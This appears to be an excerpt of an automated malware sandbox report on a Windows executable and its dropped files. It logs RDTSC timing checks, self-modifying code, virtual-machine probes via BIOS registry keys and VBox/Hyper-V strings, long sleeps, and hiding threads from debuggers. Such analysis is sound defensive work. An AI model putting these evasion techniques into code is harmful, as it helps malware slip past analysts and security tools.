Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5380E16 second address: 5380E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5380E1A second address: 5380E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5380E20 second address: 5380E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5380E26 second address: 5380E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 540078B second address: 54007A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 54007A7 second address: 54007AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 54007AC second address: 54007B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 54007B2 second address: 54007B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53F0AE7 second address: 53F0B05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, si 0x00000012 call 00007EFFE92369CAh 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53F0B05 second address: 53F0B45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 call 00007EFFE8794FAAh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007EFFE8794FB1h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007EFFE8794FB3h 0x0000001e push ecx 0x0000001f pop edx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390916 second address: 539091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 539091A second address: 5390935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390935 second address: 5390983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFE92369CFh 0x00000008 call 00007EFFE92369D8h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 jmp 00007EFFE92369D1h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, di 0x0000001f mov ebx, 4D3236AAh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53F0EBC second address: 53F0EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov bh, ch 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFFE8794FB3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53F0EDA second address: 53F0FA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFFE92369D5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007EFFE92369CEh 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007EFFE92369CDh 0x0000001c and eax, 78FBE246h 0x00000022 jmp 00007EFFE92369D1h 0x00000027 popfd 0x00000028 popad 0x00000029 push dword ptr [ebp+0Ch] 0x0000002c pushad 0x0000002d mov eax, 4AC9C993h 0x00000032 jmp 00007EFFE92369D8h 0x00000037 popad 0x00000038 push dword ptr [ebp+08h] 0x0000003b pushad 0x0000003c mov bx, si 0x0000003f movzx eax, dx 0x00000042 popad 0x00000043 push CE625CA6h 0x00000048 pushad 0x00000049 mov ch, 67h 0x0000004b pushfd 0x0000004c jmp 00007EFFE92369CDh 0x00000051 and si, FBB6h 0x00000056 jmp 00007EFFE92369D1h 0x0000005b popfd 0x0000005c popad 0x0000005d add dword ptr [esp], 319EA35Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007EFFE92369CDh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53F0FA1 second address: 53F0FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119CA0D second address: 119CA26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE92369D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119CA26 second address: 119CA2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D033F second address: 53D039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007EFFE92369D3h 0x0000000c add eax, 7EB6922Eh 0x00000012 jmp 00007EFFE92369D9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007EFFE92369D1h 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ecx, ebx 0x00000027 mov edx, 66CE8A4Ah 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D039A second address: 53D03A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D03A0 second address: 53D03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007EFFE92369D6h 0x0000000f and esp, FFFFFFF0h 0x00000012 jmp 00007EFFE92369D0h 0x00000017 sub esp, 44h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007EFFE92369D7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D03EF second address: 53D041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov cx, 94D3h 0x0000000f mov si, AB2Fh 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D041E second address: 53D0422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0422 second address: 53D0430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0430 second address: 53D0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 26h 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b jmp 00007EFFE92369D4h 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 mov ax, 90CDh 0x00000016 mov bh, ah 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007EFFE92369D1h 0x00000023 sub cl, 00000056h 0x00000026 jmp 00007EFFE92369D1h 0x0000002b popfd 0x0000002c call 00007EFFE92369D0h 0x00000031 pop eax 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0495 second address: 53D04C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007EFFE8794FACh 0x0000000b add ecx, 591B82A8h 0x00000011 jmp 00007EFFE8794FABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push ecx 0x0000001d mov dh, 4Ch 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 movsx ebx, ax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D04C7 second address: 53D0512 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFFE92369D4h 0x00000008 adc ax, 3038h 0x0000000d jmp 00007EFFE92369CBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 jmp 00007EFFE92369D6h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ecx 0x00000021 pop edx 0x00000022 push esi 0x00000023 pop edi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0512 second address: 53D058D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007EFFE8794FB7h 0x0000000b sub cx, 800Eh 0x00000010 jmp 00007EFFE8794FB9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a jmp 00007EFFE8794FAEh 0x0000001f mov edi, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 mov bx, ax 0x00000026 mov ebx, eax 0x00000028 popad 0x00000029 mov dword ptr [esp+24h], 00000000h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 call 00007EFFE8794FB7h 0x00000039 pop esi 0x0000003a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D058D second address: 53D05BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lock bts dword ptr [edi], 00000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFFE92369CDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D05BF second address: 53D05C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0088 second address: 53D00A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE92369D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D00A3 second address: 53D00C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007EFFE8794FB2h 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D00C8 second address: 53D00E4 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007EFFE92369CDh 0x00000010 mov di, ax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D00E4 second address: 53D00EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D00EA second address: 53D00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D00EE second address: 53D00F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D00F2 second address: 53D012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007EFFE92369D0h 0x00000010 xor ch, 00000048h 0x00000013 jmp 00007EFFE92369CBh 0x00000018 popfd 0x00000019 mov si, 4EBFh 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov dx, DB42h 0x00000026 mov edi, 09DE698Eh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D012F second address: 53D018B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 pushfd 0x00000007 jmp 00007EFFE8794FAEh 0x0000000c sbb esi, 60382CD8h 0x00000012 jmp 00007EFFE8794FABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007EFFE8794FB6h 0x00000023 sub ecx, ecx 0x00000025 pushad 0x00000026 mov bx, 9A02h 0x0000002a pushad 0x0000002b mov si, dx 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 popad 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov eax, edx 0x00000038 mov cx, bx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D018B second address: 53D0191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0191 second address: 53D01D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f pushfd 0x00000010 jmp 00007EFFE8794FB1h 0x00000015 adc ecx, 55B53F36h 0x0000001b jmp 00007EFFE8794FB1h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, 00000001h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D01D6 second address: 53D01DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D01DC second address: 53D01E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D01E1 second address: 53D024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [esi], ecx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007EFFE92369D8h 0x00000014 jmp 00007EFFE92369D5h 0x00000019 popfd 0x0000001a mov esi, 207E1EE7h 0x0000001f popad 0x00000020 mov ecx, eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov bl, A8h 0x00000027 pushfd 0x00000028 jmp 00007EFFE92369D0h 0x0000002d xor cl, 00000048h 0x00000030 jmp 00007EFFE92369CBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D024C second address: 53D0264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0264 second address: 53D028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp ecx, 01h 0x0000000b pushad 0x0000000c jmp 00007EFFE92369CDh 0x00000011 popad 0x00000012 jne 00007F005B588D16h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov di, BEFAh 0x0000001f push edi 0x00000020 pop esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D08DD second address: 53D08ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D08ED second address: 53D08F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D08F1 second address: 53D0907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFE8794FAAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0907 second address: 53D090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D090D second address: 53D0911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0911 second address: 53D0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Special instruction interceptor: First address: FE2A4D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Special instruction interceptor: First address: 118FFAD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Special instruction interceptor: First address: 11B4D95 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Special instruction interceptor: First address: 1211B49 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 4C2A4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 66FFAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 694D95 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 6F1B49 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Special instruction interceptor: First address: 55A581 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Special instruction interceptor: First address: 558CD1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Special instruction interceptor: First address: 3A317E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Special instruction interceptor: First address: 570749 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

Code function: 0_2_053F0E9B rdtsc

0_2_053F0E9B

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 495	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 2213	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1493	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7792	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7792	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5728	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5728	Thread sleep time: -88044s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7896	Thread sleep count: 495 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7896	Thread sleep time: -14850000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8144	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7976	Thread sleep count: 2213 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7976	Thread sleep time: -4428213s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7904	Thread sleep count: 1493 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7904	Thread sleep time: -2987493s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe TID: 8016	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe TID: 8012	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe TID: 4020	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe TID: 2836	Thread sleep time: -56028s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: rapes.exe, rapes.exe, 0000000A.00000002.3622852362.0000000000650000.00000040.00000001.01000000.00000007.sdmp, 958e367d97.exe, 958e367d97.exe, 0000000D.00000002.2778212912.0000000000537000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 958e367d97.exe, 0000000D.00000002.2779133231.000000000093F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2748143842.000000000093F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000A.00000003.2107434916.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWoH
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH<
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000A.00000003.2107434916.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000002.2779133231.000000000093F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2748143842.000000000093F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000002.2779133231.000000000090A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: L0erlgyZ6f.exe, 00000000.00000002.1218478056.0000000001170000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, 00000002.00000002.1254842337.0000000000650000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 0000000A.00000002.3622852362.0000000000650000.00000040.00000001.01000000.00000007.sdmp, 958e367d97.exe, 0000000D.00000002.2778212912.0000000000537000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
